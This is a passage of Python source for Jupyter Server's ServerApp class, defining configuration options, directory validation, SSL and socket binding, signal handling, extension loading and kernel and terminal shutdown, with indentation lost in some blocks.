help=_i18n(
"""Extra paths to search for serving jinja templates.
Can be used to override templates from jupyter_server.templates."""
),
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_services = List(
Unicode(),
config=True,
help=_i18n(
"""handlers that should be loaded at higher priority than the default services"""
),
)
websocket_url = Unicode(
"",
config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
""",
)
quit_button = Bool(
True,
config=True,
help="""If True, display controls to shut down the Jupyter server, such as menu items or buttons.""",
)
# REMOVE in VERSION 2.0
# Temporarily allow content managers to inherit from the 'notebook'
# package. We will deprecate this in the next major release.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
"jupyter_server.services.contents.manager.ContentsManager",
"notebook.services.contents.manager.ContentsManager",
],
config=True,
help=_i18n("The content manager class to use."),
)
# Throws a deprecation warning to notebook based contents managers.
@observe("contents_manager_class")
def _observe_contents_manager_class(self, change):
    """Warn when the configured contents manager comes from the 'notebook' package."""
    manager = change["new"]
    # If 'new' is a class, get a string representing the import
    # module path.
    if inspect.isclass(manager):
        manager = manager.__module__
    if not manager.startswith("notebook"):
        return
    self.log.warning(
        "The specified 'contents_manager_class' class inherits a manager from the "
        "'notebook' package. This is not guaranteed to work in future "
        "releases of Jupyter Server. Instead, consider switching the "
        "manager to inherit from the 'jupyter_server' managers. "
        "Jupyter Server will temporarily allow 'notebook' managers "
        "until its next major release (2.x)."
    )
# Pluggable manager classes; init_configurables() instantiates these.
kernel_manager_class = Type(
default_value=AsyncMappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_i18n("The kernel manager class to use."),
)
session_manager_class = Type(
default_value=SessionManager, config=True, help=_i18n("The session manager class to use.")
)
config_manager_class = Type(
default_value=ConfigManager, config=True, help=_i18n("The config manager class to use")
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
""",
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_i18n("The login handler class to use."),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_i18n("The logout handler class to use."),
)
trust_xheaders = Bool(
False,
config=True,
help=(
_i18n(
"Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"
)
),
)
# Per-process runtime files, named after the server's PID.
info_file = Unicode()
@default("info_file")
def _default_info_file(self):
info_file = "jpserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default("browser_open_file")
def _default_browser_open_file(self):
basename = "jpserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
browser_open_file_to_run = Unicode()
@default("browser_open_file_to_run")
def _default_browser_open_file_to_run(self):
basename = "jpserver-file-to-run-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
# Retained only to emit a removal error; see _update_pylab below.
pylab = Unicode(
"disabled",
config=True,
help=_i18n(
"""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
"""
),
)
@observe("pylab")
def _update_pylab(self, change):
    """when --pylab is specified, display a warning and exit"""
    # Mention the requested backend in the hint unless it was just "warn".
    backend = "" if change["new"] == "warn" else " %s" % change["new"]
    self.log.error(
        _i18n("Support for specifying --pylab on the command line has been removed.")
    )
    self.log.error(
        _i18n("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(
            backend
        )
    )
    self.exit(1)
notebook_dir = Unicode(config=True, help=_i18n("DEPRECATED, use root_dir."))
@observe("notebook_dir")
def _update_notebook_dir(self, change):
# Deprecation shim: forward notebook_dir to root_dir.
if self._root_dir_set:
# only use deprecated config if new config is not set
return
self.log.warning(_i18n("notebook_dir is deprecated, use root_dir"))
self.root_dir = change["new"]
root_dir = Unicode(config=True, help=_i18n("The directory to use for notebooks and kernels."))
# True once root_dir has been set explicitly (by config or file_to_run).
_root_dir_set = False
@default("root_dir")
def _default_root_dir(self):
if self.file_to_run:
# Serving a single file: root the server at that file's directory.
self._root_dir_set = True
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return os.getcwd()
def _normalize_dir(self, value):
    """Return *value* as an absolute path without a trailing separator."""
    # Strip any trailing slashes
    # *except* if it's root
    _, tail = os.path.splitdrive(value)
    if tail == os.sep:
        return value
    stripped = value.rstrip(os.sep)
    if os.path.isabs(stripped):
        return stripped
    # If we receive a non-absolute path, make it absolute.
    return os.path.abspath(stripped)
@validate("root_dir")
def _root_dir_validate(self, proposal):
# Normalize, then require the directory to exist.
value = self._normalize_dir(proposal["value"])
if not os.path.isdir(value):
# NOTE(review): '%r' already adds quotes, so this message renders with
# doubled quotes (''path'') — confirm before changing the msgid.
raise TraitError(trans.gettext("No such directory: '%r'") % value)
return value
preferred_dir = Unicode(
config=True,
help=trans.gettext("Preferred starting directory to use for notebooks and kernels."),
)
@default("preferred_dir")
def _default_prefered_dir(self):
# Default the preferred dir to the server's root dir.
return self.root_dir
@validate("preferred_dir")
def _preferred_dir_validate(self, proposal):
    """Validate preferred_dir: it must exist and live inside root_dir."""
    value = self._normalize_dir(proposal["value"])
    if not os.path.isdir(value):
        raise TraitError(trans.gettext("No such preferred dir: '%r'") % value)
    # preferred_dir must be equal or a subdir of root_dir
    # Compare path components, not raw string prefixes: a bare startswith()
    # wrongly accepted siblings like '/home/user2' for root '/home/user'.
    # os.path.join(root, "") appends a separator except for the filesystem root.
    if value != self.root_dir and not value.startswith(os.path.join(self.root_dir, "")):
        raise TraitError(
            trans.gettext("preferred_dir must be equal or a subdir of root_dir: '%r'") % value
        )
    return value
@observe("root_dir")
def _root_dir_changed(self, change):
    """Record the explicit root_dir and keep preferred_dir inside it."""
    self._root_dir_set = True
    new_root = change["new"]
    # Component-wise containment check: a raw startswith() would treat
    # '/home/user2' as inside '/home/user'. os.path.join(root, "") appends
    # a separator except at the filesystem root.
    inside = self.preferred_dir == new_root or self.preferred_dir.startswith(
        os.path.join(new_root, "")
    )
    if not inside:
        self.log.warning(
            trans.gettext("Value of preferred_dir updated to use value of root_dir")
        )
        self.preferred_dir = new_root
@observe("server_extensions")
def _update_server_extensions(self, change):
    """Deprecation shim: forward server_extensions to jpserver_extensions."""
    self.log.warning(_i18n("server_extensions is deprecated, use jpserver_extensions"))
    # Forward to the replacement trait. The original assigned back to
    # server_extensions, which never migrated the configured value.
    self.jpserver_extensions = change["new"]
jpserver_extensions = Dict(
default_value={},
value_trait=Bool(),
config=True,
help=(
_i18n(
"Dict of Python modules to load as Jupyter server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."
)
),
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_i18n("Reraise exceptions encountered loading server extensions?"),
)
# iopub throttling knobs shared with the kernel message handlers.
iopub_msg_rate_limit = Float(
1000,
config=True,
help=_i18n(
"""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""
),
)
iopub_data_rate_limit = Float(
1000000,
config=True,
help=_i18n(
"""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""
),
)
rate_limit_window = Float(
3,
config=True,
help=_i18n(
"""(sec) Time window used to
check the message and data rate limits."""
),
)
shutdown_no_activity_timeout = Integer(
0,
config=True,
help=(
"Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the Jupyter server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown."
),
)
terminals_enabled = Bool(
True,
config=True,
help=_i18n(
"""Set to False to disable terminals.
This does *not* make the server more secure by itself.
Anything the user can in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""
),
)
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
# NOTE: the original opened the help string with a stray fourth quote
# ('""""'), which injected a literal '"' into the displayed help text.
authenticate_prometheus = Bool(
    True,
    help="""
    Require authentication to access prometheus metrics.
    """,
    config=True,
)
# The ExtensionApp (if any) that launched this server; set externally.
_starter_app = Instance(
default_value=None,
allow_none=True,
klass="jupyter_server.extension.application.ExtensionApp",
)
@property
def starter_app(self):
"""Get the Extension that started this server."""
return self._starter_app
def parse_command_line(self, argv=None):
    """Parse argv, treating a single extra path argument as root_dir or file_to_run."""
    super(ServerApp, self).parse_command_line(argv)
    if not self.extra_args:
        return
    arg0 = self.extra_args[0]
    target = os.path.abspath(arg0)
    self.argv.remove(arg0)
    if not os.path.exists(target):
        self.log.critical(_i18n("No such file or directory: %s"), target)
        self.exit(1)
    # Use config here, to ensure that it takes higher priority than
    # anything that comes from the config dirs.
    c = Config()
    if os.path.isdir(target):
        c.ServerApp.root_dir = target
    elif os.path.isfile(target):
        c.ServerApp.file_to_run = target
    self.update_config(c)
def init_configurables(self):
# Instantiate the pluggable managers in dependency order: kernel spec,
# kernel, contents, session (needs the previous two), then config.
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = (
"jupyter_server.gateway.managers.GatewayMappingKernelManager"
)
self.session_manager_class = "jupyter_server.gateway.managers.GatewaySessionManager"
self.kernel_spec_manager_class = (
"jupyter_server.gateway.managers.GatewayKernelSpecManager"
)
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (ServerApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
# (route "tornado" through self.log so our handlers/level apply).
logger = logging.getLogger("tornado")
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_webapp(self):
    """Initialize the tornado web application.

    Populates ``tornado_settings``, validates password and UNIX-socket
    options (exiting on fatal misconfiguration), constructs the
    ServerWebApplication, and finalizes ``self.ssl_options`` (set to
    None when no SSL is configured).
    """
    self.tornado_settings["allow_origin"] = self.allow_origin
    self.tornado_settings["websocket_compression_options"] = self.websocket_compression_options
    if self.allow_origin_pat:
        self.tornado_settings["allow_origin_pat"] = re.compile(self.allow_origin_pat)
    self.tornado_settings["allow_credentials"] = self.allow_credentials
    self.tornado_settings["autoreload"] = self.autoreload
    self.tornado_settings["cookie_options"] = self.cookie_options
    self.tornado_settings["get_secure_cookie_kwargs"] = self.get_secure_cookie_kwargs
    self.tornado_settings["token"] = self.token

    # ensure default_url starts with base_url
    if not self.default_url.startswith(self.base_url):
        self.default_url = url_path_join(self.base_url, self.default_url)

    if self.password_required and (not self.password):
        self.log.critical(
            _i18n("Jupyter servers are configured to only be run with a password.")
        )
        self.log.critical(_i18n("Hint: run the following command to set a password"))
        self.log.critical(_i18n("\t$ python -m jupyter_server.auth password"))
        sys.exit(1)

    # Socket options validation.
    if self.sock:
        if self.port != DEFAULT_JUPYTER_SERVER_PORT:
            self.log.critical(
                ("Options --port and --sock are mutually exclusive. Aborting."),
            )
            sys.exit(1)
        else:
            # Reset the default port if we're using a UNIX socket.
            self.port = 0

        if self.open_browser:
            # If we're bound to a UNIX socket, we can't reliably connect from a browser.
            self.log.info(
                ("Ignoring --ServerApp.open_browser due to --sock being used."),
            )

        if self.file_to_run:
            self.log.critical(
                ("Options --ServerApp.file_to_run and --sock are mutually exclusive."),
            )
            sys.exit(1)

        if sys.platform.startswith("win"):
            self.log.critical(
                (
                    "Option --sock is not supported on Windows, but got value of %s. Aborting."
                    % self.sock
                ),
            )
            sys.exit(1)

    self.web_app = ServerWebApplication(
        self,
        self.default_services,
        self.kernel_manager,
        self.contents_manager,
        self.session_manager,
        self.kernel_spec_manager,
        self.config_manager,
        self.extra_services,
        self.log,
        self.base_url,
        self.default_url,
        self.tornado_settings,
        self.jinja_environment_options,
    )
    if self.certfile:
        self.ssl_options["certfile"] = self.certfile
    if self.keyfile:
        self.ssl_options["keyfile"] = self.keyfile
    if self.client_ca:
        self.ssl_options["ca_certs"] = self.client_ca
    if not self.ssl_options:
        # could be an empty dict or None
        # None indicates no SSL config
        self.ssl_options = None
    else:
        # SSL may be missing, so only import it if it's to be used
        import ssl

        # PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
        # server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
        self.ssl_options.setdefault(
            "ssl_version", getattr(ssl, "PROTOCOL_TLS", ssl.PROTOCOL_SSLv23)
        )
        if self.ssl_options.get("ca_certs", False):
            self.ssl_options.setdefault("cert_reqs", ssl.CERT_REQUIRED)
        # (removed dead local `ssl_options = self.ssl_options`; the call
        # below already reads self.ssl_options directly)
    self.login_handler_class.validate_security(self, ssl_options=self.ssl_options)
def init_resources(self):
    """initialize system resources

    Raises the soft RLIMIT_NOFILE to ``min_open_files_limit`` when the
    current soft limit is lower; never lowers an existing limit.
    """
    # `resource` is None on platforms where limits cannot be adjusted
    # (for example, Windows), making this a no-op there.
    if resource is None:
        self.log.debug(
            "Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)"
        )
        return

    old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
    soft = self.min_open_files_limit
    hard = old_hard
    if old_soft < soft:
        # Bump the hard limit too when the requested soft limit exceeds it.
        if hard < soft:
            hard = soft
        self.log.debug(
            "Raising open file limit: soft {}->{}; hard {}->{}".format(
                old_soft, soft, old_hard, hard
            )
        )
        resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def _get_urlparts(self, path=None, include_token=False):
    """Constructs a urllib named tuple, ParseResult,
    with default values set by server config.
    The returned tuple can be manipulated using the `_replace` method.

    Parameters
    ----------
    path : str, optional
        URL path; defaults to ``self.default_url``.
    include_token : bool, optional
        If True and a token is set, append a ``token`` query argument.
        The real token is only shown when this server generated it;
        config-supplied tokens are masked as "...".
    """
    if self.sock:
        # UNIX socket: the socket path is encoded into the netloc.
        scheme = "http+unix"
        netloc = urlencode_unix_socket_path(self.sock)
    else:
        # Handle nonexplicit hostname.
        if self.ip in ("", "0.0.0.0"):
            # Bound to all interfaces; advertise this machine's hostname.
            ip = "%s" % socket.gethostname()
        else:
            ip = self.ip
        netloc = "{ip}:{port}".format(ip=ip, port=self.port)
        if self.certfile:
            scheme = "https"
        else:
            scheme = "http"
    if not path:
        path = self.default_url
    query = None
    if include_token:
        if self.token:  # Don't log full token if it came from config
            token = self.token if self._token_generated else "..."
            query = urllib.parse.urlencode({"token": token})
    # Build the URL Parts to dump. params/fragment are passed as None
    # (falsy), which geturl() simply omits.
    urlparts = urllib.parse.ParseResult(
        scheme=scheme, netloc=netloc, path=path, params=None, query=query, fragment=None
    )
    return urlparts
@property
def public_url(self):
    """Publicly advertised URL for this server, token included.

    Non-empty parts of ``custom_display_url`` override the computed URL.
    """
    parts = self._get_urlparts(include_token=True)
    # Update with custom pieces.
    if self.custom_display_url:
        # Parse custom display_url
        custom = urllib.parse.urlparse(self.custom_display_url)._asdict()
        # Get pieces that matter (non None)
        custom_updates = {key: item for key, item in custom.items() if item}
        # Update public URL parts with custom pieces.
        parts = parts._replace(**custom_updates)
    return parts.geturl()
@property
def local_url(self):
    """URL reachable from this machine, token included.

    TCP servers get their host forced to the loopback address;
    UNIX-socket servers keep the netloc produced by ``_get_urlparts``.
    """
    url_parts = self._get_urlparts(include_token=True)
    if self.sock:
        return url_parts.geturl()
    # Plain TCP server: point at loopback regardless of the bind address.
    loopback = "127.0.0.1:" + str(self.port)
    return url_parts._replace(netloc=loopback).geturl()
@property
def display_url(self):
    """Human readable string with URLs for interacting
    with the running Jupyter Server
    """
    return "{}\n or {}".format(self.public_url, self.local_url)
@property
def connection_url(self):
    """Base URL (scheme://netloc/base_url) clients use to reach this server."""
    return self._get_urlparts(path=self.base_url).geturl()
def init_terminals(self):
    """Enable terminal support when configured and importable.

    Terminal support is optional: an ImportError only logs a warning
    instead of failing server startup.
    """
    if not self.terminals_enabled:
        return

    try:
        from jupyter_server.terminal import initialize

        initialize(self.web_app, self.root_dir, self.connection_url, self.terminado_settings)
        # Only flipped to True on successful initialization.
        self.terminals_available = True
    except ImportError as e:
        self.log.warning(_i18n("Terminals not available (error was %s)"), e)
def init_signal(self):
    """Register signal handlers for shutdown, confirmation and info."""
    # Only trap SIGINT interactively: the confirmation dialog needs a
    # real tty, and this is skipped on Windows.
    if not sys.platform.startswith("win") and sys.stdin and sys.stdin.isatty():
        signal.signal(signal.SIGINT, self._handle_sigint)
    signal.signal(signal.SIGTERM, self._signal_stop)
    if hasattr(signal, "SIGUSR1"):
        # Windows doesn't support SIGUSR1
        signal.signal(signal.SIGUSR1, self._signal_info)
    if hasattr(signal, "SIGINFO"):
        # only on BSD-based systems
        signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
    """SIGINT handler spawns confirmation dialog"""
    # register more forceful signal handler for ^C^C case
    signal.signal(signal.SIGINT, self._signal_stop)
    # request confirmation dialog in bg thread, to avoid
    # blocking the App
    thread = threading.Thread(target=self._confirm_exit)
    thread.daemon = True
    thread.start()

def _restore_sigint_handler(self):
    """callback for restoring original SIGINT handler"""
    signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
    """confirm shutdown on ^C

    A second ^C, or answering 'y' within 5s will cause shutdown,
    otherwise original SIGINT handler will be restored.
    This doesn't work on Windows.

    Runs in a background thread spawned by ``_handle_sigint``.
    """
    info = self.log.info
    info(_i18n("interrupted"))
    # Check if answer_yes is set
    if self.answer_yes:
        self.log.critical(_i18n("Shutting down..."))
        # schedule stop on the main thread,
        # since this might be called from a signal handler
        self.stop(from_signal=True)
        return
    print(self.running_server_info())
    yes = _i18n("y")
    no = _i18n("n")
    sys.stdout.write(_i18n("Shutdown this Jupyter server (%s/[%s])? ") % (yes, no))
    sys.stdout.flush()
    # Wait up to 5 seconds for input on stdin.
    r, w, x = select.select([sys.stdin], [], [], 5)
    if r:
        line = sys.stdin.readline()
        if line.lower().startswith(yes) and no not in line.lower():
            self.log.critical(_i18n("Shutdown confirmed"))
            # schedule stop on the main thread,
            # since this might be called from a signal handler
            self.stop(from_signal=True)
            return
    else:
        print(_i18n("No answer for 5s:"), end=" ")
        print(_i18n("resuming operation..."))
    # no answer, or answer is no:
    # set it back to original SIGINT handler
    # use IOLoop.add_callback because signal.signal must be called
    # from main thread
    self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
    """Handle SIGTERM (or a repeated SIGINT): stop the server immediately."""
    self.log.critical(_i18n("received signal %s, stopping"), sig)
    self.stop(from_signal=True)

def _signal_info(self, sig, frame):
    """Handle SIGUSR1/SIGINFO: print current server status to stdout."""
    print(self.running_server_info())
def init_components(self):
    """Check the components submodule, and warn if it's unclean.

    Currently a no-op: components are managed with bower rather than a
    git submodule, so there is nothing to verify here yet.
    """
    # TODO: this should still check, but now we use bower, not git submodule
def find_server_extensions(self):
    """
    Searches Jupyter paths for jpserver_extensions.

    Discovered extensions are merged into both ``self.config`` and
    ``self.jpserver_extensions`` without overriding entries already set.
    """
    # Walk through all config files looking for jpserver_extensions.
    #
    # Each extension will likely have a JSON config file enabling itself in
    # the "jupyter_server_config.d" directory. Find each of these and
    # merge their results in order of precedence.
    #
    # Load server extensions with ConfigManager.
    # This enables merging on keys, which we want for extension enabling.
    # Regular config loading only merges at the class level,
    # so each level clobbers the previous.
    config_paths = jupyter_config_path()
    if self.config_dir not in config_paths:
        # add self.config_dir to the front, if set manually
        config_paths.insert(0, self.config_dir)
    manager = ExtensionConfigManager(read_config_path=config_paths)
    extensions = manager.get_jpserver_extensions()

    for modulename, enabled in sorted(extensions.items()):
        if modulename not in self.jpserver_extensions:
            # Only add extensions that were not explicitly configured;
            # explicit ServerApp config wins over discovered files.
            self.config.ServerApp.jpserver_extensions.update({modulename: enabled})
            self.jpserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
    """
    If an extension's metadata includes an 'app' key,
    the value must be a subclass of ExtensionApp. An instance
    of the class will be created at this step. The config for
    this instance will inherit the ServerApp's config object
    and load its own config.
    """
    # Create an instance of the ExtensionManager.
    self.extension_manager = ExtensionManager(log=self.log, serverapp=self)
    self.extension_manager.from_jpserver_extensions(self.jpserver_extensions)
    # Linking lets each extension register its config before loading.
    self.extension_manager.link_all_extensions()
def load_server_extensions(self):
    """Load any extensions specified by config.

    Import the module, then call the load_jupyter_server_extension function,
    if one exists.
    The extension API is experimental, and may change in future releases.
    """
    self.extension_manager.load_all_extensions()
def init_mime_overrides(self):
    """Force correct mimetypes for static assets on Windows.

    Some Windows machines have incorrect mimetypes registered in the
    registry; tornado consults ``mimetypes`` when serving .css/.js, and
    browsers reject those files when the type is wrong. So on Windows
    we reinitialize ``mimetypes`` without the registry and pin the
    entries pages require. No-op everywhere else.
    """
    if os.name != "nt":
        return
    # do not trust windows registry, which regularly has bad info
    mimetypes.init(files=[])
    # ensure css, js are correct, which are required for pages to function
    mimetypes.add_type("text/css", ".css")
    mimetypes.add_type("application/javascript", ".js")
    # .wasm is not registered by default for python <3.8
    mimetypes.add_type("application/wasm", ".wasm")
def shutdown_no_activity(self):
    """Shutdown server on timeout when there are no kernels or terminals.

    Invoked periodically (see ``init_shutdown_no_activity``); does
    nothing while any kernel or terminal is still running.
    """
    km = self.kernel_manager
    if len(km) != 0:
        return  # Kernels still running

    if self.terminals_available:
        term_mgr = self.web_app.settings["terminal_manager"]
        if term_mgr.terminals:
            return  # Terminals still running

    seconds_since_active = (utcnow() - self.web_app.last_activity()).total_seconds()
    self.log.debug("No activity for %d seconds.", seconds_since_active)
    if seconds_since_active > self.shutdown_no_activity_timeout:
        self.log.info(
            "No kernels or terminals for %d seconds; shutting down.", seconds_since_active
        )
        self.stop()
def init_shutdown_no_activity(self):
    """Schedule the idle-shutdown check when a timeout is configured."""
    if self.shutdown_no_activity_timeout > 0:
        self.log.info(
            "Will shut down after %d seconds with no kernels or terminals.",
            self.shutdown_no_activity_timeout,
        )
        # Poll for inactivity once per minute (60000 ms).
        pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
        pc.start()
@property
def http_server(self):
    """An instance of Tornado's HTTPServer class for the Server Web Application."""
    try:
        return self._http_server
    except AttributeError as e:
        # Replace the bare AttributeError with an actionable message.
        raise AttributeError(
            "An HTTPServer instance has not been created for the "
            "Server Web Application. To create an HTTPServer for this "
            "application, call `.init_httpserver()`."
        ) from e
def init_httpserver(self):
    """Creates an instance of a Tornado HTTPServer for the Server Web Application
    and sets the http_server attribute.

    Exits the process when no port/socket can be bound.
    """
    # Check that a web_app has been initialized before starting a server.
    if not hasattr(self, "web_app"):
        raise AttributeError(
            "A tornado web application has not be initialized. "
            "Try calling `.init_webapp()` first."
        )

    # Create an instance of the server.
    self._http_server = httpserver.HTTPServer(
        self.web_app,
        ssl_options=self.ssl_options,
        xheaders=self.trust_xheaders,
        max_body_size=self.max_body_size,
        max_buffer_size=self.max_buffer_size,
    )
    # Bind to a UNIX socket or TCP port depending on configuration.
    success = self._bind_http_server()
    if not success:
        self.log.critical(
            _i18n(
                "ERROR: the Jupyter server could not be started because "
                "no available port could be found."
            )
        )
        self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
    """Bind the HTTP server to the configured UNIX socket.

    Returns
    -------
    bool
        True on success; False when the socket is in use or permission
        is denied. Any other socket error propagates.
    """
    if unix_socket_in_use(self.sock):
        self.log.warning(_i18n("The socket %s is already in use.") % self.sock)
        return False

    try:
        # sock_mode is an octal permission string (e.g. "0600");
        # int(..., 8) parses it directly -- the previous .encode() round
        # trip through bytes was unnecessary.
        sock = bind_unix_socket(self.sock, mode=int(self.sock_mode, 8))
        self.http_server.add_socket(sock)
    except socket.error as e:
        if e.errno == errno.EADDRINUSE:
            self.log.warning(_i18n("The socket %s is already in use.") % self.sock)
            return False
        elif e.errno in (errno.EACCES, getattr(errno, "WSAEACCES", errno.EACCES)):
            self.log.warning(_i18n("Permission to listen on sock %s denied") % self.sock)
            return False
        else:
            raise
    else:
        return True
def _bind_http_server_tcp(self):
    """Try to listen on ``self.port``, falling back to random ports.

    Returns True on success; exits the process when no port can be
    bound after ``port_retries`` attempts.
    """
    success = None
    # random_ports yields the configured port first, then fallbacks.
    for port in random_ports(self.port, self.port_retries + 1):
        try:
            self.http_server.listen(port, self.ip)
        except socket.error as e:
            if e.errno == errno.EADDRINUSE:
                if self.port_retries:
                    self.log.info(
                        _i18n("The port %i is already in use, trying another port.") % port
                    )
                else:
                    self.log.info(_i18n("The port %i is already in use.") % port)
                continue
            elif e.errno in (errno.EACCES, getattr(errno, "WSAEACCES", errno.EACCES)):
                self.log.warning(_i18n("Permission to listen on port %i denied.") % port)
                continue
            else:
                raise
        else:
            # Bound successfully; record the port actually used.
            self.port = port
            success = True
            break
    if not success:
        if self.port_retries:
            self.log.critical(
                _i18n(
                    "ERROR: the Jupyter server could not be started because "
                    "no available port could be found."
                )
            )
        else:
            self.log.critical(
                _i18n(
                    "ERROR: the Jupyter server could not be started because "
                    "port %i is not available."
                )
                % port
            )
        self.exit(1)
    return success
@staticmethod
def _init_asyncio_patch():
    """set default asyncio policy to be compatible with tornado

    Tornado 6.0 is not compatible with default asyncio
    ProactorEventLoop, which lacks basic *_reader methods.
    Tornado 6.1 adds a workaround to add these methods in a thread,
    but SelectorEventLoop should still be preferred
    to avoid the extra thread for ~all of our events,
    at least until asyncio adds *_reader methods
    to proactor.
    """
    # Proactor became the Windows default in Python 3.8.
    if sys.platform.startswith("win") and sys.version_info >= (3, 8):
        import asyncio

        try:
            from asyncio import (
                WindowsProactorEventLoopPolicy,
                WindowsSelectorEventLoopPolicy,
            )
        except ImportError:
            pass
            # not affected
        else:
            if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
                # prefer Selector to Proactor for tornado + pyzmq
                asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(
    self, argv=None, find_extensions=True, new_httpserver=True, starter_extension=None
):
    """Initialize the Server application class, configurables, web application, and http server.

    Parameters
    ----------
    argv : list or None
        CLI arguments to parse.
    find_extensions : bool
        If True, find and load extensions listed in Jupyter config paths. If False,
        only load extensions that are passed to ServerApp directly through
        the `argv`, `config`, or `jpserver_extensions` arguments.
    new_httpserver : bool
        If True, a tornado HTTPServer instance will be created and configured for the Server Web
        Application. This will set the http_server attribute of this class.
    starter_extension : str
        If given, it references the name of an extension point that started the Server.
        We will try to load configuration from extension point
    """
    self._init_asyncio_patch()
    # Parse command line, load ServerApp config files,
    # and update ServerApp config.
    super(ServerApp, self).initialize(argv=argv)
    if self._dispatching:
        # A subcommand was dispatched; nothing further to do here.
        return
    # Then, use extensions' config loading mechanism to
    # update config. ServerApp config takes precedence.
    if find_extensions:
        self.find_server_extensions()
    self.init_logging()
    self.init_server_extensions()
    # Special case the starter extension and load
    # any server configuration it provides.
    if starter_extension:
        # Configure ServerApp based on named extension.
        point = self.extension_manager.extension_points[starter_extension]
        # Set starter_app property.
        if point.app:
            self._starter_app = point.app
        # Load any configuration that comes from the Extension point.
        self.update_config(Config(point.config))
    # Initialize other pieces of the server.
    self.init_resources()
    self.init_configurables()
    self.init_components()
    self.init_webapp()
    self.init_terminals()
    self.init_signal()
    self.init_ioloop()
    self.load_server_extensions()
    self.init_mime_overrides()
    self.init_shutdown_no_activity()
    if new_httpserver:
        self.init_httpserver()
async def cleanup_kernels(self):
    """Shutdown all kernels.

    The kernels will shutdown themselves when this process no longer exists,
    but explicit shutdown allows the KernelManagers to cleanup the connection files.
    """
    n_kernels = len(self.kernel_manager.list_kernel_ids())
    # ngettext picks the singular/plural message form.
    kernel_msg = trans.ngettext(
        "Shutting down %d kernel", "Shutting down %d kernels", n_kernels
    )
    self.log.info(kernel_msg % n_kernels)
    await run_sync_in_loop(self.kernel_manager.shutdown_all())
async def cleanup_terminals(self):
    """Shutdown all terminals.

    The terminals will shutdown themselves when this process no longer exists,
    but explicit shutdown allows the TerminalManager to cleanup.
    """
    # No-op when terminal support was never initialized.
    if not self.terminals_available:
        return

    terminal_manager = self.web_app.settings["terminal_manager"]
    n_terminals = len(terminal_manager.list())
    terminal_msg = trans.ngettext(
        "Shutting down %d terminal", "Shutting down %d terminals", n_terminals
    )
    self.log.info(terminal_msg % n_terminals)
    await run_sync_in_loop(terminal_manager.terminate_all())
async def cleanup_extensions(self):
